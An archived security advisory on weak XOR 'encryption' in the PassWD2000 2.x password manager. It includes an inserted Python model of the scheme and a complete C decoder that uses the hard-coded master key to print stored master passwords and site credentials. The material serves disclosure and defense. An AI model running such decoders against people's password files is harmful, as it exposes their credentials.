SecurityTracker.com

SecurityTracker Archives

Category:   Application (Security)  >   PassWD2000
Vendors:   Giordano, Bigarelli
PassWD2000 Password Management Utility May Disclose Passwords to Local Users
SecurityTracker Alert ID:  1001685
SecurityTracker URL:  http://securitytracker.com/id/1001685
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 5 2001
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 2.X, up through 2.8
Description:   A vulnerability has been discovered in PassWD2000 that allows local users to decode password files and obtain password authentication data.

It is reported that PassWD2000 uses a weak encryption scheme that can be readily decoded by a local user.

PassWD2000 apparently stores authentication information, including passwords, in .PEF files. It reportedly uses a simple exclusive-or with a randomly generated 128 bit session key to encrypt the header and data of the PEF file. The session key is then exclusive-or'd with a fixed master key and stored in front of the encrypted PEF header.

A demonstration exploit script is included in the Source Message.

The vendor has reportedly been notified and plans to change the password file encryption scheme in an upcoming 3.X release.

Impact:   A local user can decode the password files used by PassWD2000 and obtain user password authentication data.
Solution:   No solution was available at the time of this entry. The vendor reportedly plans to use a different encryption scheme in an upcoming v3.X release.
Vendor URL:  www.passwd2000.com
Cause:   Access control error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  PassWD2000 v2.x Weak Encryption Vulnerability




==[ PassWD2000 v2.x Weak Encryption Vulnerability ]===============


              "Success does not consist in never making mistakes
                  but in never making the same one a second time"
                                       --- George Bernard Shaw



Vulnerable:
        PassWD2000 2.0
        PassWD2000 2.1 (*)
        PassWD2000 2.2 (*)
        PassWD2000 2.3 (*)
        PassWD2000 2.4 (*)
        PassWD2000 2.5
        PassWD2000 2.6
        PassWD2000 2.7
        PassWD2000 2.8
         - Microsoft Windows 95
         - Microsoft Windows 98
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000
         - Microsoft Windows ME

        (*): Apparently never made it into a public release.

Not vulnerable:

Vendor:
        Giordano Bigarelli <info@passwd2000.com>
        http://www.passwd2000.com/


--[ Overview ]----------------------------------------------------

 PassWD2000 is a password management utility designed to store
 login credentials to remote sites, local passwords or
 registration details, or even credit card information.

 Unfortunately, the vendor's understanding of encryption is a bit
 different from mine. PassWD2000 is using an "encryption"
 algorithm that is trivial to break, effectively giving an
 attacker access to all login information stored within
 PassWD2000 once he gains access to the password file.

 PassWD2000 has received the ZDNet Editors' Pick award and other
 share/freeware recommendations, and thus must be considered to
 be in widespread use.



 Think you heard all this before? Definitely. Precisely one year
 ago, which is a coincidence, I published a similar problem of the
 predecessor PassWD v1.2; it used an even weaker "encryption"
 algorithm. For details refer to BID 1300 at:

 http://www.securityfocus.com/bid/1300


--[ Vendor Status ]-----------------------------------------------

 Vendor is informed, and has decided to do nothing about this
 issue. According to the vendor, PassWD2000 never claimed to use
 strong encryption, only "quite strong encryption". So there will
 be no fix in versions 2.x. The vendor has also decided not to
 inform anyone about the issue: neither users nor distribution
 sites of PassWD2000 are going to be informed by the vendor.


--[ Solution ]----------------------------------------------------

 Don't use PassWD2000 2.x, and make sure none of your users or
 admins do either. Period. According to the vendor, the upcoming
 3.x release of PassWD2000 will use Blowfish to protect the data.


--[ Technical Details ]-------------------------------------------

 PassWD2000 stores all login credentials along with the access
 password and a bunch of other things in .PEF files. PEF stands
 for PassWD Encrypted Format.

 Basically it uses a simple exclusive or with a 128 bit key. It
 randomly generates a 128 bit session key, which is used to
 encrypt the header and data of the PEF file. It stores this
 session key xored to a fixed master key in front of the
 encrypted header within the PEF file.

 So what you do is xor the fixed master key with the first 128
 bits of the file to reveal the session key. Then use the session
 key to decrypt the header and data of the file. The only pitfall
 to avoid is that header and data are encrypted separately: the
 key offset restarts at zero at the beginning of the data part.
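
The scheme described above, modelled end to end in Python. This is an added example, not code from the advisory or from PassWD2000: the 16 master key bytes are the ones the advisory's decoder carries, the file layout (16-byte wrapped session key, then header, then data, each part XORed with the session key from key offset 0) follows the text, and the header, data and session key values are constructed sample input. The wrap side is simply the inverse of the decoding the advisory describes.

```python
# Added example (not from the advisory or from PassWD2000): a model of the PEF
# v2.x scheme the advisory describes, so the weakness can be seen end to end.
# MASTER_KEY holds the bytes from the advisory's decoder; the file layout
# follows the advisory text. Header, data and session key values below are
# constructed sample values, not real PassWD2000 file contents.
import os

MASTER_KEY = bytes([0x0A, 0x0C, 0x4D, 0x1E, 0x01, 0x4F, 0x03, 0x06,
                    0x5F, 0x64, 0x96, 0xC8, 0xFA, 0x11, 0x0D, 0x47])

# constructed sample file contents; the header is 19 bytes on purpose,
# i.e. not a multiple of the 16-byte key, so the key-offset pitfall shows
SAMPLE_SESSION_KEY = bytes(range(0x10, 0x20))
SAMPLE_HEADER = b"hdr:masterpw=secret"
SAMPLE_DATA = b"mail\ralice\rhunter2\rhttps://mail.example\r2001-06-05\r"


def xor_stream(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated from key offset 0 (a 16-byte repeating pad)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pef_wrap(header: bytes, data: bytes, session_key=None) -> bytes:
    """Assemble a file the way the advisory describes PassWD2000 v2.x doing it.

    The random session key is 'protected' only by XOR with the fixed master
    key, and header and data are each XORed with the session key starting
    at key offset 0.
    """
    if session_key is None:
        session_key = os.urandom(16)
    if len(session_key) != 16:
        raise ValueError("session key must be 128 bits")
    wrapped_key = xor_stream(session_key, MASTER_KEY)
    return wrapped_key + xor_stream(header, session_key) + xor_stream(data, session_key)


def pef_unwrap(blob: bytes, hdrlen: int):
    """Recover session key, header and data from a wrapped file.

    Nothing here is secret: MASTER_KEY is a constant that ships inside the
    program, so XORing it with the first 16 bytes of any file is a fixed,
    reversible transform and the session key is as good as stored in the clear.
    """
    if len(blob) < 16 + hdrlen:
        raise ValueError("file shorter than session key plus header")
    session_key = xor_stream(blob[:16], MASTER_KEY)
    header = xor_stream(blob[16:16 + hdrlen], session_key)
    # the pitfall the advisory mentions: the key offset restarts at the data
    data = xor_stream(blob[16 + hdrlen:], session_key)
    return session_key, header, data


def unwrap_without_reset(blob: bytes) -> bytes:
    """Decode header and data as one continuous stream (the mistake to avoid)."""
    session_key = xor_stream(blob[:16], MASTER_KEY)
    return xor_stream(blob[16:], session_key)


def demo():
    """Round-trip the constructed sample file and show the key-offset pitfall."""
    blob = pef_wrap(SAMPLE_HEADER, SAMPLE_DATA, SAMPLE_SESSION_KEY)
    session_key, header, data = pef_unwrap(blob, len(SAMPLE_HEADER))
    continuous = unwrap_without_reset(blob)[len(SAMPLE_HEADER):]
    return {
        "session_key_recovered": session_key == SAMPLE_SESSION_KEY,
        "header_recovered": header == SAMPLE_HEADER,
        "data_recovered": data == SAMPLE_DATA,
        # with a 19-byte header the pad is 3 bytes out of phase, so every
        # data byte comes out wrong when the key offset is not reset
        "data_without_reset_matches": continuous == SAMPLE_DATA,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point to take from `pef_unwrap` is that it needs no input other than the file and the constant master key: XOR with a fixed key is a bijection anyone holding the program can invert, so the wrapped session key adds no confidentiality over storing it in the clear, and the random session key in turn only turns the file into a repeating-pad XOR. A password manager's file format needs a key derived from a user secret and an authenticated cipher, which is why the advisory's only recommendation is to stop using the 2.x format.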


--[ Proof of Concept ]--------------------------------------------

 I've written the decoder for PassWD2000 v2.x PEF files. It has
 grown with my knowledge of the file format, thus is very ugly
 code indeed, and probably unportable (compiles with gcc-2.95.2).
 It should illustrate how to decode a PEF file though.


--[ Afterword ]---------------------------------------------------

 If you copy this text or reuse any part of it, please give due
 credit (and let me know about it).

 Copyright (C) 2001 by Daniel Roethlisberger <daniel@roe.ch>.



A MIME encoded file has been decoded by SecurityTracker for your
convenience:

/*
 *  Decoder for PassWD2000 v2.x password files in PEF format
 *
 *  Written 2001 by Daniel Roethlisberger <daniel@roe.ch>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  This code has grown with my knowledge about the data
 *  format, thus it is quite a bit messy and ugly indeed.
 */

#include <stdio.h>
#include <stdlib.h>   /* malloc, free, exit */
#include <libgen.h>   /* basename */
#include <sys/stat.h>

/* fixed master key, used to unwrap the per-file session key */
const unsigned char key[16] = {
	0x0A, 0x0C, 0x4D, 0x1E, 0x01, 0x4F, 0x03, 0x06,
	0x5F, 0x64, 0x96, 0xC8, 0xFA, 0x11, 0x0D, 0x47};

#define leave(x) {\
	fprintf(stderr, "%s: " x "\n", basename(argv[0]));\
	exit(1);\
}
#define leaveheader() {\
	free(buf);\
	leave("header inconsistency");\
}
/* bail out if the header claims more bytes than the file holds */
#define need(n) { if((offset) + (n) > buflen) leaveheader(); }

/* decode one header byte in place with the session key (buf[0..15])
 * and advance; written as two statements because modifying 'offset'
 * and reading it in the same expression is undefined behaviour in C */
#define hdrbyte() { buf[offset] ^= buf[offset % 0x10]; offset++; }

int main(int argc, char *argv[])
{
	FILE* infile;
	unsigned char *buf;
	struct stat st;
	int buflen;
	int offset, i, count;
	int hdrlen, pwlen, reclen, recnum;

	if(argc != 2)
		leave("only argument must be file to decode");

	infile = fopen(argv[1], "rb");
	if(!infile)
		leave("cannot open file");

	if(stat(argv[1], &st) != 0)
		leave("cannot stat file");
	buflen = (int) st.st_size;
	buf = (unsigned char*) malloc(buflen);
	if(!buf)
		leave("out of memory");
	if(fread(buf, 1, buflen, infile) != (size_t) buflen)
	{
		free(buf);
		leave("short read");
	}
	fclose(infile);
	printf("[%s]\n", argv[1]);

	if(buflen < 0x1D) /* minimal empty header */
		leaveheader();

	offset = 0;

	/* decode 128bit session key: it is stored xored with the fixed
	 * master key in the first 16 bytes of the file */
	printf("Session key: ");
	for(i = 0; i < 0x10; i++)
	{
		buf[i] ^= key[i];
		printf("%.2X ", buf[i]);
	}
	printf("\n");
	offset += i;

	/* decode header ... each header byte is xored with the session
	 * key byte at (file offset mod 16) */

	/* always seems to be '0' */
	hdrbyte();
	printf("Unknown pre-header byte: %c (should be 0)\n", buf[offset-1]);

	/* header length, two ASCII digits ... */
	hdrbyte();
	hdrbyte();
	hdrlen = (buf[offset-2] - '0') * 10 + buf[offset-1] - '0';
	if(hdrlen < 0)
		leaveheader();
	printf("Header length: %i\n", hdrlen);

	/* always seems to be '2U00' */
	printf("Unknown header bytes: ");
	for(i = 0; i < 4; i++)
	{
		buf[offset+i] ^= buf[(offset+i)%0x10];
		printf("%c" , buf[offset+i]);
	}
	printf(" (should be 2U00)\n");
	offset += i;

	/* password status ... */
	hdrbyte();
	printf("Password protection: %s\n", (buf[offset-1] == '1') ? "enabled" : "disabled");

	/* password: two ASCII digits of length, then the password itself ... */
	for(i = 0; i < 2; i++)
		buf[offset+i] ^= buf[(offset+i)%0x10];
	offset += i;
	pwlen = (buf[offset-2] - '0') * 10 + (buf[offset-1] - '0');
	if(pwlen < 0 || pwlen > 30)
		leaveheader();
	need(pwlen + 1);
	printf("Master password: ");
	for(i = 0; i < pwlen; i++)
	{
		buf[offset+i] ^= buf[(offset+i)%0x10];
		printf("%c", buf[offset+i]);
	}
	printf(" (%i)\n", pwlen);
	offset += i;

	/* number of records: one digit giving the digit count, then
	 * that many ASCII digits ... */
	hdrbyte();
	reclen = buf[offset-1] - '0';
	if(reclen < 0 || reclen > 9)
		leaveheader();
	need(reclen + 1);
	for(i = 0; i < reclen; i++)
		buf[offset+i] ^= buf[(offset+i)%0x10];
	offset += i;
	recnum = 0;
	for(i = reclen; i > 0; --i)
		recnum = (10 * recnum) + buf[offset-i] - '0';
	printf("Number of records: %i\n", recnum);

	/* header checksum ... */
	hdrbyte();
	printf("Header checksum: 0x%.2X\n", buf[offset-1]);

	/* and records: the key offset restarts at zero for the data part */
	for(i = 0; i < (buflen - offset); i++)
		buf[offset+i] ^= buf[i%0x10];

	if(0x14 + hdrlen != offset)
		printf("Warning: hdrlen mismatch (%i != %i)!\n", hdrlen+0x14, offset);

	if(recnum > 0)
	{
		count = 0;
		printf("Records: [desc - user:pass@URL (date)]\n");
		/* fields are CR separated, ten fields per record */
		for(i = 0x14 + hdrlen; i < buflen; i++)
		{
			if(buf[i] == '\r')
				switch((count++)%10)
				{
					case 0: printf(" - "); break;
					case 1: printf(":"); break;
					case 2: printf("@"); break;
					case 3: printf(" ("); break;
					case 4: printf(")"); break;
					case 9:	printf("\n"); break;
				}
			else
				printf("%c", buf[i]);
		}
	}

	free(buf);
	return 0;
}








Copyright 2021, SecurityGlobal.net LLC